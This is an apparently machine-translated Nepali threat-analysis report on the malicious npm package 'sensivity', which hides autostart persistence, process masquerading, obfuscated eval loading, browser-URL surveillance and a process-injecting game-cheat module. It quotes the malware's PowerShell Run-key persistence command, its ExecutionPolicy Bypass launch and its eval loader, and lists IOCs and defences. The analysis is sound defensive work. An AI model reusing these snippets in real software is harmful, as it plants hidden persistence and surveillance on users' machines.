TL; ड
एनपीएम प्याकेज संवेदनशीलता यसले आफूलाई "सेन्सिभिटी कन्ट्रोल प्यानल" को रूपमा वर्णन गर्दछ। विन्डोजमा यो रिमोट-कन्ट्रोल र निगरानी उपकरणको रूपमा व्यवहार गर्दछ।
यसको प्रवेश बिन्दु, launcher.js, यसको आफ्नै प्रक्रियालाई Runtime Broker मा पुन: नामाकरण गर्दछ, autostart Run-key मान नामक लेख्छ OneDriveUpdate जसले लुकेको VBScript मार्फत प्याकेजलाई पुन: सुरुवात गर्छ, PowerShell लाई जन्माउँछ -ExecutionPolicy Bypass, र त्यसपछि ६.८७ एमबी नेटिभ मोड्युलसँगै १७१ केबी अस्पष्ट सर्भर पेलोडको मूल्याङ्कन गर्दछ, sens.node.
यसले TCP पोर्ट ३००० मा फोन-जोडी नियन्त्रण प्यानलको सेवा दिन्छ र Windows UIAutomation मार्फत सक्रिय ब्राउजरको ठेगाना-बार URL पढ्छ, एउटा हार्ड-कोड गरिएको YouTube भिडियो हेर्छ।
पहिले कालो बक्सको रूपमा छोडिएका दुई भागहरू अब समाधान गरिएका छन्। अस्पष्ट सर्भर, server.obf.js, obfuscator.io RC4 string-array योजना प्रयोग गर्दछ; यसको डिकोडर अफलाइन पुन: कार्यान्वयन गर्नाले (जाभास्क्रिप्ट कार्यान्वयन गरिएको छैन) एकल बाह्य अन्त्य बिन्दु पुन: प्राप्ति गर्दछ — https://izopi.com/check.php — हस्ताक्षरित इजाजतपत्र प्रतिक्रियाहरू प्रमाणित गर्न प्रयोग गरिने एम्बेडेड RSA सार्वजनिक कुञ्जीसँगै।
नेटिभ मोड्युल, sens.node, प्याक गरिएको छैन: यसको आयात तालिका र एम्बेडेड स्ट्रिङहरूले यसलाई DirectX 11 / Dear ImGui इन-गेम ओभरलेको रूपमा पहिचान गर्दछ जसले एम्बोट, ESP (वाल-ह्याक), र ट्रिगरबोट सुविधाहरू प्रदान गर्दछ, जुन रिमोट-प्रोसेस इन्जेक्सन र मेमोरी रिड/राइटहरूद्वारा संचालित हुन्छ।
यसको भित्रका स्ट्रिङहरूले GTA V / FiveM सँग मिल्दोजुल्दो सवारी साधनहरू र नक्सा स्थानहरूलाई सन्दर्भ गर्दछ। npm प्याकेज त्यो नेटिभ मोड्युल वरिपरि डेलिभरी र पर्सिस्टन्स र्यापर हो।
परिभाषित संकेत प्राविधिक होइन, सञ्चालनमा छ: एउटा बेनामी प्रकाशकले एउटा प्याकेजको लगभग सत्तरी संस्करणहरू अगाडि बढायो — 2.5.0 मार्फत 2.5.69 — केही दिनसम्म, प्रत्येकले एउटै लन्चर बोकेका थिए।
कुनै स्थापना छैन hooks। प्याकेज सुरु हुँदा मात्र पेलोड चल्छ।
आक्रमण: यो कसरी काम गर्छ
संवेदनशीलताले दस फाइलहरू पठाउँछ। package.json स्पारस छ: कुनै रिपोजिटरी फिल्ड छैन, कुनै इजाजतपत्र छैन, एउटा मुख्य र दुई बिन उपनामहरू (संवेदनशीलता, सेन्स) सबै launcher.js मा औंल्याइएको छ, र नोड launcher.js को सुरुवात स्क्रिप्ट। त्यहाँ कुनै पोस्टइन्स्टल वा प्रिइन्स्टल छैन। npm स्थापनामा केहि पनि चल्दैन। तल वर्णन गरिएको व्यवहार प्रयोगकर्ताले प्याकेज सुरु गर्दा चल्छ — बिन शिम, सुरुवात स्क्रिप्ट, वा आवश्यकता मार्फत।
टार्बलले लन्चर, एउटा अस्पष्ट सर्भर, नेटिभ मोड्युल, एउटा भिजुअल बेसिक स्क्रिप्ट, र कन्ट्रोल प्यानलको लागि एउटा सार्वजनिक/वेब डाइरेक्टरी बोक्छ। launcher.js पढ्न सकिने अर्केस्ट्रेटर हो; रनटाइममा महत्त्वपूर्ण तर्क यसले लोड गर्ने दुई ब्लबहरूमा रहन्छ - एउटा अस्पष्ट सर्भर र एउटा कम्पाइल गरिएको नेटिभ मोड्युल, दुबै तल समाधान गरिएको छ।
प्रक्रिया बहाना र नक्कली OneDrive अपडेटर
कार्यान्वयनको सुरुवातमा launcher.js ले आफ्नो प्रक्रियाको नाम दुई पटक सेट गर्छ:
javascript process.title = 'Runtime Broker'; रनटाइम ब्रोकर एउटा वैध विन्डोज प्रक्रिया (RuntimeBroker.exe) हो जसले एप अनुमतिहरूको मध्यस्थता गर्छ। नोड प्रक्रियालाई मिलाउनको लागि पुन: नामकरण गर्नु भनेको टास्क म्यानेजरमा एक द्रुत नजरले केही असामान्य देखाउँदैन।
पर्सिस्टेन्स प्रत्यक्ष रजिस्ट्री API को सट्टा PowerShell मार्फत लेखिएको छ:
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); अटोस्टार्ट मानलाई OneDriveUpdate नाम दिइएको छ, र यसले सिधै प्याकेजलाई संकेत गर्दैन। यसले बन्डल गरिएको OneDrive.Standalone.Updater.vbs चलाउने wscript.exe मा संकेत गर्छ। त्यो स्क्रिप्टले लुकेको विन्डोमा नोड launcher.js पुन: सुरु गर्छ। Run-key नाम र VBScript फाइलनाम दुवैले Microsoft ब्रान्डिङ उधारो लिन्छ, त्यसैले अटोस्टार्ट प्रविष्टिलाई नियमित OneDrive कार्यको रूपमा पढिन्छ।
कार्यान्वयन-नीति बाइपासको साथ पावरशेल
लन्चरले बारम्बार पावरशेलमा शेल आउट गर्छ। स्क्यानरहरूले महत्वपूर्ण रूपमा फ्ल्याग गर्ने सिङ्क भनेको कार्यान्वयन नीति असक्षम पारिएको उत्पन्न .ps1 को सुरुवात हो:
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); ExecutionPolicy Bypass ले त्यो आह्वानको लागि स्थानीय स्क्रिप्ट-साइनिङ जाँच हटाउँछ। उत्पन्न गरिएका स्क्रिप्टहरूले अर्को खण्डमा वर्णन गरिएको ब्राउजर-निगरानी र विन्डो-पत्ता लगाउने कार्यलाई ह्यान्डल गर्दछ।
अस्पष्ट सर्भर र नेटिभ मोड्युल
सेटअप पछि, launcher.js ले यसको वास्तविक पेलोड लोड र कार्यान्वयन गर्दछ:
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js १७१ KB को _0x-array obfuscation हो — JavaScript ढाँचा जहाँ प्रत्येक स्ट्रिङ र पहिचानकर्तालाई अनुक्रमणिकाद्वारा शफल गरिएको एरेमा प्रतिस्थापन गरिन्छ, त्यसपछि रनटाइममा डि-रेफरेन्स गरिन्छ। यो योजना obfuscator.io द्वारा उत्पादित RC4 संस्करण हो: एकल डिकोडर प्रकार्य base64-एरे प्रविष्टिलाई डिकोड गर्दछ र त्यसपछि RC4-प्रति-कल कुञ्जीसँग यसलाई डिक्रिप्ट गर्दछ। त्यो डिकोडरलाई छुट्टै स्क्रिप्टमा पुन: कार्यान्वयन गर्दै — निकालिएको ८२१-प्रविष्टि स्ट्रिङ एरेमा मात्र पुन: कार्यान्वयन चलाउँदै, प्याकेजको आफ्नै जाभास्क्रिप्ट कहिल्यै हुँदैन — यसलाई सफासँग खोल्छ। कुन सतहहरू सामान्य छन् तरcisive: एउटा बाह्य URL, https://izopi.com/check.php`, LICENSE_URL स्थिरांकमा तोकिएको; एउटा एम्बेडेड RSA PUBLIC_KEY_PEM`; स्थानीय प्यानलले /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off, र /trigger/status मार्गहरू; र स्ट्रिङहरू child_process, crypto, र [Sensivity] sens.node लोड गरिएको - अन्तिम सटीक लग लाइन हो जुन लन्चरले लोड गरिएको प्रोग्राम मोड्युलमा पुन: लेख्छ। अन्तिम बिन्दु भनेको लाइसेन्स जाँच हो: क्लाइन्टले पहिचानकर्ता पोस्ट गर्दछ (अस्पष्ट सर्भरले Discord ID: %s स्ट्रिङ ढाँचा गर्दछ) र RSA कुञ्जीले सर्भरको हस्ताक्षरित प्रतिक्रिया प्रमाणित गर्दछ।
sens.node एउटा ६.८७ MB कम्पाइल गरिएको नेटिभ एडअन हो, र यो प्याक गरिएको छैन — सेक्सन एन्ट्रोपी ५.६–६.६ मा बस्छ र PE आयात र निर्यात तालिकाहरू अक्षुण्ण छन्, त्यसैले यसको क्षमताहरू सिधै पढ्न सकिन्छ। यसले napi_register_module_v1 निर्यात गर्छ, standard नोड N-API प्रविष्टि बिन्दु, त्यसैले eval'd सर्भरले यसलाई प्लेन आवश्यकताले लोड गर्छ। यसको आयात तालिका भनेको टेल हो। KERNEL32 बाट यसले OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules, र Process32First/NextW तान्छ — अर्को प्रक्रिया पत्ता लगाउन, यसको भित्र मेमोरी आवंटित गर्न, र त्यो मेमोरी पढ्न वा लेख्नको लागि क्यानोनिकल सेट। USER32 बाट यसले GetAsyncKeyState, GetKeyState, mouse_event, र SetCursorPos तान्छ; यसले d3d11.dll, D3DCOMPILER_43, र dwmapi लाई अन-स्क्रिन ओभरलेको लागि, र नेटवर्क कलहरूको लागि पूर्ण WINHTTP सेटलाई लिङ्क गर्दछ। यसको एम्बेडेड स्ट्रिङहरूले अस्पष्टता बिना सुविधा सेटको नाम दिन्छ: Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected, र Dear ImGui ब्यानर Dear ImGui 1.91.3 WIP सक्षम गर्नुहोस्। Grapeseed Medical Clinic र vehicle-ESP शब्दावली जस्ता स्थान र संस्था स्ट्रिङहरू GTA V / FiveM सँग मिल्दोजुल्दो छन्।
विभाजन जानाजानी गरिएको छ: पढ्न मिल्ने launcher.js ले स्क्यानरले सजिलै पढ्ने भागहरू मात्र बोक्छ — दृढता, मास्करेड, eval कल आफैं — जबकि अस्पष्टताले रनटाइम सम्पर्कहरू मध्ये एक बाह्य होस्टलाई लुकाउँछ, र बाइनरीले खेल-ओभरले र प्रक्रिया-इन्जेक्शन तर्क राख्छ। लन्चर पातलो, अडिटेबल शेल हो; अस्पष्ट सर्भरले नेटवर्क पहिचान लुकाउँछ; नेटिभ मोड्युल पेलोड हो। हामी बाइनरीको आयात र स्ट्रिङहरूलाई पढिएको रूपमा वर्णन गर्छौं; हामी तिनीहरूबाट अपरेटरको उद्देश्य अनुमान गर्दैनौं।
पोर्ट ३००० मा फोन-जोडा बनाउने नियन्त्रण प्यानल
लन्चरले TCP पोर्ट ३००० मा स्थानीय वेब सर्भर व्यवस्थापन गर्छ र यसलाई सिंगलटनको रूपमा व्यवहार गर्छ। यसले अवस्थित श्रोताको लागि क्वेरी गर्छ र बाइन्डिङ गर्नु अघि यसलाई खाली गर्छ:
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); प्यानल http://localhost:3000 मा पहुँचयोग्य छ, जसको हार्ड-कोडेड LAN फलब्याक URL http://192.168.1.16:3000 छ। सार्वजनिक/ निर्देशिका र प्यानलको व्यवहार QR-जोडी प्रवाहसँग मिल्दोजुल्दो छ: फोनले कोड स्क्यान गर्छ र रिमोटको रूपमा होस्टमा बाँध्छ। लन्चरमा कुनै बाह्य आदेश-र-नियन्त्रण डोमेन स्पष्ट पाठमा देखा पर्दैन — तर, माथिको डिअब्फस्केसनले देखाएको रूपमा, एउटा अस्पष्ट सर्भरमा उपस्थित छ: izopi.com लाइसेन्स एन्डपोइन्ट। प्यानल आफैं स्थानीय र LAN-स्कोप गरिएको छ; एक मात्र आउटबाउन्ड होस्ट त्यो लाइसेन्स जाँच हो।
एक अलग पर्यवेक्षक/कार्यकर्ता मोडेलले प्रक्रियालाई जीवित राख्छ। लन्चरले SENSIVITY_SUPERVISOR र SENSIVITY_WORKER वातावरण झण्डाहरूसँग आफूलाई पुन: उत्पन्न गर्छ, प्रत्येक चाइल्ड लुकेर चल्छ, त्यसैले एउटा प्रक्रियालाई समाप्त गर्दा यसलाई पुन: सुरु गर्न वाचडग छोडिन्छ।
ब्राउजर निगरानी र युट्युब सिग्नल
सबैभन्दा विशिष्ट व्यवहार ब्राउजर निगरानी हो। launcher.js ले PowerShell बनाउँछ जसले Windows UIAutomation लाई चलिरहेको ब्राउजरको ठेगाना पट्टी पढ्न चलाउँछ:
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ValuePattern ले UI तत्वको पाठ सामग्री फर्काउँछ। ब्राउजरको ठेगाना-पट्टी सम्पादन नियन्त्रणमा लागू गरिएको, यसले पीडितले हाल हेरिरहेको URL फर्काउँछ — ब्राउजर एक्सटेन्सन बिना, डिस्कमा प्रोफाइल नछोइकन, र API हुक बिना। उत्पन्न गरिएको स्क्रिप्टले $browserNames सूची दोहोर्याउँछ र अग्रभूमिमा रहेको जुनसुकै ब्राउजरको URL वा विन्डो शीर्षक निकाल्छ।
त्यो URL एउटा हार्ड-कोडेड लक्ष्य विरुद्ध परीक्षण गरिएको छ:
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; युट्युब देखाउने ब्राउजर विन्डोको लागि तीन-सेकेन्डको लूपमा लन्चर पोलहरू, र उत्पन्न गरिएको PowerShell ले त्यो भिडियो ID सँग मेल खाने Get-YouTubeBrowser / Test-TargetYouTubeUrl जोडी बोक्छ। अवलोकनयोग्य प्रभाव दुई गुणा हुन्छ: सक्रिय ब्राउजिङ URL पीडितको स्क्रिनबाट पढिन्छ, र होस्टको एउटा विशिष्ट युट्युब भिडियोसँगको अन्तर्क्रिया पत्ता लाग्छ। हामी संयन्त्र र लक्ष्यको वर्णन गर्छौं; हामी तिनीहरूबाट कुनै उद्देश्य अनुमान गर्दैनौं।
स्क्यानरले sensitive_data_enumeration लेबल गर्ने ठेगाना-पट्टी पढ्ने कुरा हो — एउटा Process::env र UIAutomation स्रोत जसले नेटवर्क-सक्षम रनटाइमलाई खुवाउँछ। यो अलगावमा सौम्य देखिन्छ र UIAutomation स्रोतबाट अस्पष्ट सर्भरमा डेटा जीवनचक्र ट्रेस गरिसकेपछि मात्र निगरानीको समाधान गर्छ।
समयरेखा र संस्करण विकास
संवेदनशीलता एक-शट अपलोड होइन। प्रकाशक खातामा यस एकल प्याकेजको लगभग सत्तरी प्रकाशित संस्करणहरू छन्, र समीक्षा विन्डोको समयमा नयाँहरू आइरहन्छन्। लन्चरले २.५.x लाइनमा सुविधा अनुसार सुविधा बढाउँछ जबकि यसको स्थिरता र पेलोड-लोडिंग स्थिर रहन्छ।
| मिति (UTC) | अवलोकन गरिएका संस्करणहरू | लन्चरको अवस्था |
|---|---|---|
| 2026-06-02 | 2.5.8 - 2.5.46 (25) | आधार QR-प्यानल लन्चर; रन-की पर्सिस्टन्स; अस्पष्ट सर्भरको मूल्याङ्कन। |
| 2026-06-03 | 2.5.53 - 2.5.61 (6) | उही फिंगरप्रिन्ट; कन्सोल-ट्रेस दमन। |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | पिन गरिएको YouTube संलग्नता लक्ष्य थप्छ wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 - 2.5.69 (24) | दायराभरि खाली ठाउँहरू पुन: प्रकाशित गर्नुहोस्; पर्यवेक्षक/कामदार निगरानीकर्ता। |
डाउनलोड गरिएका प्रतिनिधिहरू - २.५.०, २.५.३६, र २.५.६९ - मा लन्चर पढ्दा चार तहहरू देखिन्छन्। सबैभन्दा पहिलेका निर्माणहरूमा आधार QR-जोडी लन्चर हुन्छ। २.५.३३ बाट UIAutomation ठेगाना-बार हार्वेस्टर देखा पर्दछ। २.५.५८ बाट सुपरिवेक्षक-व्यवस्थापन तह थपिएको छ। २.५.६४ बाट डिटेच गरिएको सुपरिवेक्षक/कार्यकर्ता वाचडगले सेट पूरा गर्दछ। यस अवधिमा, चार कुराहरू कहिल्यै परिवर्तन हुँदैनन्: OneDriveUpdate रन कुञ्जी, OneDrive.Standalone.Updater.vbs ड्रपर, eval'd server.obf.js, र sens.node नेटिभ मोड्युल।
२०२६-०६-०५ को लहर उल्लेखनीय छ किनकि यसले कम संस्करण संख्याहरू - २.५.० देखि २.५.१५ सम्म - पुन: प्रकाशित गर्यो जुन केही दिन अघि पुष्टि गरिएका संस्करणहरू भन्दा तल बस्छन्। प्रभाव रजिस्ट्रीमा एक संलग्न २.५.x लाइन हो, प्रत्येक संस्करणमा एउटै लन्चर हुन्छ।
सम्झौताका सूचकहरू
तलका सबै सूचकहरू प्याकेज टार्बलबाट सिधै पढिएका थिए। पढ्न सकिने लन्चरले केवल लूपब्याक र एउटा निजी LAN ठेगाना बोक्छ; एउटा बाह्य होस्टनाम, izopi.com, server.obf.js लाई अफलाइन deobfuscating गरेर पुन: प्राप्त गरिएको थियो।
| प्रकार | सूचक | टिप्पणीहरू |
|---|---|---|
| प्याकेज | npm:sensivity (≈७० संस्करणहरू, 2.5.0-2.5.69) | एकल-प्याकेज प्रकाशक; कुनै भण्डार छैन; इजाजतपत्र बिना। |
| फाइल | launcher.js | पढ्न सकिने अर्केस्ट्रेटर; मुख्य र बिन लक्ष्य। |
| फाइल | server.obf.js (≈१७१ केबी) | obfuscator.io RC4 स्ट्रिङ-एरे पेलोड, मार्फत लोड गरिएको eval(fs.readFileSync(...)). |
| फाइल | sens.node (≈६.८७ एमबी) | PE32+ x86-64 नोड N-API एडअन; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| फाइल | OneDrive.Standalone.Updater.vbs | लुकेको पुन: सुरुवातकर्ता (node launcher.js). |
| नेटवर्क | https://izopi.com/check.php | अस्पष्ट सर्भरबाट इजाजतपत्र/प्रमाणीकरण अन्त्यबिन्दु पुनःप्राप्त गरियो; इम्बेडेड RSA सार्वजनिक कुञ्जीले प्रतिक्रियाहरू प्रमाणित गर्दछ। |
| क्षमता | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | रिमोट-प्रक्रिया इंजेक्शन र मेमोरी पढ्ने/लेख्ने क्षमता। |
| क्षमता | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | DirectX ११ / ImGui खेल ओभरलेले एम्बोट, ESP, र ट्रिगरबोट सुविधाहरू कार्यान्वयन गर्दै। |
| रजिस्ट्री | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | स्वतः सुरु मानमा औंल्याउँदै wscript.exe र VBScript लन्चर। |
| प्रक्रिया | process.title = 'Runtime Broker' | वैध विन्डोज रनटाइम ब्रोकर प्रक्रियाको रूपमा लुकाउँछ। |
| व्यवहार | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | उत्पन्न गरिएको PowerShell स्क्रिप्टहरूको लागि प्रयोग गरिएको कार्यान्वयन-नीति बाइपास। |
| व्यवहार | UIAutomation ValuePattern ब्राउजर ठेगाना पट्टी पढ्ने | अग्रभूमि ब्राउजर विन्डोको URL पढ्छ। |
| व्यवहार | लक्षित भिडियो ID wJWta2lO0Lw; ३-सेकेन्डको YouTube पोल | पिन गरिएको संलग्नता-निगरानी संकेत। |
| नेटवर्क | http://localhost:3000, फलब्याक http://192.168.1.16:3000 | स्थानीय रूपमा र LAN मा खुला QR-जोडी नियन्त्रण प्यानल। |
| वातावरण | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | अलग गरिएको वाचडग प्रक्रिया समन्वय झण्डाहरू। |
विशेषता, प्रभाव, र रक्षकहरू
यो प्याकेज एउटा npm खाताद्वारा प्रकाशित गरिएको छ जसको भनिएको इमेल एक अप्रमाणित Gmail ठेगाना हो। खाताले गहिरो नकारात्मक रजिस्ट्री प्रतिष्ठा स्कोर बोक्छ, यो एउटा प्याकेज मात्र कायम राख्छ र प्रकाशित गर्छ, र कुनै लिङ्क गरिएको स्रोत भण्डार छैन। हामीले इमेलको स्वामित्व प्रमाणित गरेका छैनौं र हामी अभियानलाई प्रकाशक खातामा श्रेय दिन्छौं, कुनै नाम दिइएको व्यक्तिलाई होइन। लन्चरले कुनै स्पष्ट पाठ पूर्वाधार बोक्दैन, तर एउटा बाह्य होस्ट अब ज्ञात छ: अस्पष्ट सर्भरले इजाजतपत्र जाँचको लागि izopi.com लाई सम्पर्क गर्दछ, र नेटिभ मोड्युल - उल्टो निर्देशन-द्वारा-निर्देशनको सट्टा यसको आयात तालिका र स्ट्रिङहरूबाट पढिएको - एउटा खेल ओभरले हो जसले अर्को प्रक्रियाको मेमोरीमा इन्जेक्ट गर्छ र पढ्छ।
अवलोकनयोग्य प्रभाव विन्डोज प्रयोगकर्ताहरूमा पर्छ जसले नियन्त्रण-प्यानल उपयोगिताको अपेक्षा गर्दै संवेदनशीलता स्थापना र चलाउँछन्। ती होस्टहरूमा प्याकेजले OneDrive कार्यको रूपमा भेषमा अटोस्टार्ट पर्सिस्टन्स स्थापना गर्दछ, प्रणाली प्रक्रियाको नक्कल गर्न आफैलाई पुन: नामाकरण गर्दछ, प्रयोगकर्ताले ब्राउज गरिरहेको कुनै पनि कुराको URL पढ्छ, र एक जोडी प्यानल खडा गर्दछ जसले मेसिनलाई स्थानीय नेटवर्कमा रिमोटमा बाँध्छ। सुपरवाइजर/वर्कर वाचडगको अर्थ एकल प्रक्रिया किलले यसलाई हटाउँदैन; रन-की प्रविष्टि रिबुटहरूमा जीवित रहन्छ। macOS र Linux लन्चरद्वारा लक्षित छैनन् - पर्सिस्टन्स, PowerShell, र UIAutomation पथहरू Windows-मात्र हुन्।
सत्तरी-संस्करणको मन्थन फ्ल्याग गर्न लायक प्रवृत्ति हो। केही दिनमा दर्जनौं पटक एउटा प्याकेज पुन: प्रकाशित गर्नाले, पहिले नै हटाइएका संस्करण नम्बरहरू भन्दा तल ब्याक-फिलिंग सहित, हटाउने बीचमा रजिस्ट्रीमा लाइभ प्रतिलिपि राख्छ र संस्करण-पिन गरिएका ब्लकलिस्टहरूलाई निराश बनाउँछ। sensivity@2.5.61 को लागि ब्लकलिस्ट प्रविष्टिले अर्को दिन पुन: प्रकाशित sensivity@2.5.3 विरुद्ध केही गर्दैन।
रक्षकहरूले निम्न कुराहरूमा कार्य गर्न सक्छन्:
- रजिस्ट्री-प्रोक्सी र CI अनुमति सूचीहरूमा प्याकेज नामको संवेदनशीलतालाई पूर्ण रूपमा रोक्नुहोस्। व्यक्तिगत संस्करणहरू पिन गर्दा पुन: प्रकाशन तालमा हानि हुन्छ; नाम टिकाउ सूचक हो।
- OneDriveUpdate नामक रन मान खोज्नुहोस् जसको डेटाले प्रति-प्रयोगकर्ता मार्गमा .vbs विरुद्ध wscript.exe प्रयोग गर्दछ। वास्तविक OneDrive अपडेटर यस तरिकाले दर्ता गरिएको छैन।
- Process.title रनटाइम ब्रोकर भएको Node.js प्रक्रियाको बारेमा अलर्ट। वास्तविक ब्रोकर RuntimeBroker.exe हो, नोड रनटाइम होइन।
- कम्पाइल गरिएको .node addon र .obf.js फाइलको eval(fs.readFileSync(…)) पठाउने प्याकेजहरूको npm स्थापना-समय फेचहरू फ्ल्याग गर्नुहोस्। त्यो जोडी - अस्पष्ट पाठ पेलोडको छेउमा लोड गरिएको अपारदर्शी नेटिभ बाइनरी - यहाँ संरचनात्मक टेल हो, कुनै पनि स्ट्रिङ IOC बाट स्वतन्त्र।
- अप्रत्याशित नोड प्रक्रियाबाट उत्पन्न पोर्ट ३००० मा स्थानीय रूपमा बाँधिएको कुनै पनि श्रोतालाई व्यवस्थित विन्डोज एन्डपोइन्टहरूमा शंकास्पद मान्नुहोस्।
- विकासकर्ता वा अन्तिम-प्रयोगकर्ता होस्टहरूबाट izopi.com मा आउटबाउन्ड अनुरोधहरूमा ब्लक वा अलर्ट गर्नुहोस्; यो प्याकेजको एक मात्र बाह्य अन्त्यबिन्दु हो, जुन अस्पष्ट सर्भरबाट /check.php मा पुग्छ।
- कुनै पनि बन्डल गरिएको .node एडअनको लागि, यसलाई विश्वास गर्नु अघि यसको आयात तालिकाको निरीक्षण गर्नुहोस्। प्याकेजले के गर्ने दाबी गरे पनि OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread संयोजन रिमोट-प्रक्रिया इन्जेक्सन हो; यहाँ यो Direct3D ओभरले र aimbot/ESP/triggerbot स्ट्रिङहरूको छेउमा बस्छ।
स्थिर-विश्लेषणको लागि pipelines, कन्भिन्सन आकार संस्करण मन्थनमा टिकाउ छ: एक गैर-नेटवर्क स्थापना प्रोफाइल, ज्ञात प्रणाली-प्रक्रिया नाममा प्रक्रिया-शीर्षक असाइनमेन्ट, PowerShell मार्फत रन-की लेखन, र डिस्कबाट पढिएको फाइलको मूल्याङ्कन। ती मध्ये कुनै पनि डोमेन, IP, वा संस्करण नम्बरमा निर्भर गर्दैन जुन अर्को पुन: प्रकाशनले घुमाउन सक्छ।
सन्दर्भ
[npm: संवेदनशीलता] – यहाँ छलफल गरिएको प्याकेज संस्करण लाइनको लागि रजिस्ट्री पृष्ठ; हटाउन सकिनेछ।





